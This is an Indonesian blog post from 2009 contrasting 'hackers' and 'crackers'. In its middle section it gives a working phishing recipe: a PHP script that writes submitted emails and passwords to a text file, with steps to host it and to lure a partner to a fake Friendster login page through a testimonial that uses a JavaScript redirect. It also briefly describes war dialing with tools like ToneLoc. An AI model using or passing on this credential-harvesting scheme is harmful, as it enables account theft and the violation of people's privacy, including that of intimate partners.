Minggu, 26 April 2009

apa itu hacker

Selamat membaca.......
Mungkin teman - teman sudah sering yach ....!!! mendengar istilah Hacker atau . Namun, apa yang dimaksud Hacker & Cracker ? Lalu apa perbedaannya ? itu masih binggung x ya....!!!
Nah .... dalam perkembangan teknologi yang semakin pesat banget.....
saking pesatnya semakin meningkatnya tingkat kriminalitas deh... biasanya sih pelakunya oleh penjahat lewat internet. Seorang penjahat internet yang tidak tanggung - tanggung menguras habis uang suatu perusahaan hanya dalam hitungan menit melalui internet. Coba hebat banget ga... dalam hitungan menit ja bisa dapet uang banyak... tapi ga boleh cari uang dengan cara itu ya ...mang mau di bilang penjahat gitu, klo saya mah ga mau ah...
Lalu, Siapa Penjahat Internet Tersebut ?
Penjahat tersebut biasanya disebut dengan istilah ” Cracker”. Sepengetahuan saya Crecker itu dalam bahasa inggris itu artinya petasan / biskuit kering gitu deh ... tapi bukan itu yang kiata maksud, melainkan Crecker itu cuma sebutan buat penjahat di dunia maya ja. Crecker itu adalah musuh besarnya Hacker karena memiliki tujuan yang berkebalikan. Kalo Cracker memiliki tujuan untuk merusak komputer melalui internet. kalo Hacker sebalikannya untuk mengamankan sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama dengan cracker padahal jauh beda baget tau, hanya sama- sama orang itu megang komputer maksudnya sama- sama bisa mengerti sistem keamanan komputer. Banyak baget loh perusahan –perusahan besar mint bantuan sama hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya
Apa Itu Hacker ?
Nah.... tadi kan kita sudah membahas sedikit tentang Hacker, apa itu Hacker ? menurut saya hacker itu sebutan untuk mereka yang tertarik dan suka mengutak atik komputer ,suka membantu dan memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet.
Siapa hacker ?
Teman - teman tau engga siapa hacker itu ? yang pastinya hacker itu orang lah... orang yang bisa dan mengerti tentang komputer dalam membuat aplikasi sebuah algoritma dapat memecahkan masalah seputar logika atau analisa.
Apa yang di Hack ?
Biasanya sih... yang di hack oleh hacker seperti User name dan Password Friendster, Yahoo, My Space, Blogger, Wodpress,Klik bca dan masih banyak lagi deh...
Bagaiman meng-hack ?
Sekarang kita akan membahas tentang bagaiman meng-hack, apakah anda menpunyai Friensdter, ada juga friendster yang di jebol sama hacker loh ….
Caranya adalah .......
pertama-tama yang harus dipersiapkan adalah
1.isilah kode php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dengan nama link yg dituju pada Form Login.
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);
?>
Dan upload file diatas ke www.webyangsupportphp.com
2.Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dengan kebutuhan kamu!!.
3.Ketik testynya…
“sayang….gimana kabar kamu…”
Nah…udah gitu… Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dengan rela hati mengisi Form login tipuan. Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php. ngerti ga?, ngga yah?, iya sama!, hihihi
Mengapa meng-hacking ?
Mengapa ya….?? Ya ilah meng-hacking kalo tidak meng-hacking terus hacker kerjaannya apa donk...?? masa nganggur sih...., jadi mengapa meng-hacking ?Karena hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer untuk menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya. Pasti bahaya ya.. kalo cracker dapat menyusup dalam jaringan komputer bisa-bisa kebobolan deh....
Perbedaan dan Persamaan Hacker dan Cracker ?
Dalam Hacker dan Cracker ada perbedaan dan persamaannya loh... jadi kita bisa melihat bahwa crecker itu berbeda. Persamaan Hacker dan Krecker adalah Sama-sama melakukan aktivitas penyusupan terhadap jaringan. Keduanya berusaha untuk mendapatkan akses terhadap semua user di dalam jaringan tersebut. Dan perbedaan Hacker dan Crecker adalah Cracker biasanya bertujuan untuk melakukan pengrusakan, misalnya mengubah data pengguna, menyebarkan virus, menghapus data, bahkan mengubah tampilan situs (defacing).Cracker berkonotasi negative dibandingkan dengan Hacker. Dan Hacker biasanya hanya menembus ke dalam jaringan dan memberitahukan bahwa ada kelemahan dalam jaringanyang sudah berhasil ditembusnya tersebut, agar dapat lebih disempurnakan lagi.
Jaringan adalah cara untuk meng-hack, Contohnya ?
Jaringan adalah alat media untuk meng-hack suatu jaringan komputer.
oh.. iya.. ada satu kasus dimana sistem dengan cara menghubungi telepon yang dicurigai ada akses ke jaringan dengan modem. Biasanya yang menjadi sasaran itu nomor telepon perusahaan besar yang kemungkinan besar memiliki akses jaringan. mereka menghubungi nomor-nomor telepon yang berdekatan sampai menemukan nomor yang memberikan sinyal carrier. Jika sinyal carrier ini ditemukan mereka merasa senang karena menemukan celah untuk menyusup ke komputer yang terhubung melalui modem dan line telepon. Yah…Walaupun caranya manual, lama-lama mereka jadi keseringan dengan program khusus yang disebut Prefix Scanner, Demon Dialer, atau War Dialer. Salah satu contoh dari program tersebut adalah ToneLoc. Wah... Banyak banget ya.... kejahatan dalam kehidupan maya, apa lagi di internet dalam hitungan menit aja jaringn itu bisa di bobol sama crecker.
Kesimpulan :
Para hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Oleh karena itu, berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Maka hacker dapat disebut sebagai pahlawan jaringan sedang cracker dapat disebut sebagai penjahat jaringan karena melakukan melakukan penyusupan dengan maksud menguntungkan dirinya secara personallity dengan maksud merugikan orang lain. Hacker sering disebut hacker putih (yang merupakan hacker sejati yang sifatnya membangun) dan hacker hitam (cracker yang sifatnya membongkar dan merusak)

Tidak ada komentar:

Posting Komentar